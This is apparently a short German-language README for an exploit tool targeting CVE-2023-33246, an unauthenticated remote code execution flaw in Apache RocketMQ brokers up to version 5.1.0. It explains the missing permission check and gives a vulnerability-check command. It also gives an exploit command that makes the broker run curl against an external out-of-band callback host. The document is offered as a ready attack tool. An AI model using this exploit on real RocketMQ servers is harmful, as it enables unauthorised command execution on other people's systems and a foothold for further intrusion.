
Exploit für CVE-2023-33246, der auf Apache RocketMQ-Broker abzielt. Führt beliebige Befehle aus über nicht authentifizierte Konfigurationsaktualisierung oder gefälschte Protokollnachrichten in anfälligen Versionen 5.1.0 und darunter.
CVE-2023-33246 RocketMQ Remote Code Execution Exploit
RocketMQ-Versionen 5.1.0 und niedriger sind anfällig für beliebige Code-Injektion. Die Broker-Komponente von RocketMQ ist im Extranet freigegeben und es fehlt eine Berechtigungsprüfung. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er die Konfigurationsaktualisierungsfunktion verwendet, um Befehle als die Systembenutzer auszuführen, unter denen RocketMQ läuft. Darüber hinaus kann ein Angreifer denselben Effekt erzielen, indem er den RocketMQ-Protokollinhalt fälscht.
Überprüfen
./RocketMQRceCheck -host 127.0.0.1 -port 9876
Ausnutzen
RocketMQ_RCE_EXPLOIT 127.0.0.1 10911 curl chw9ft72vtc00002z5k0ge6rz7eyyyyyb.oast.fun/test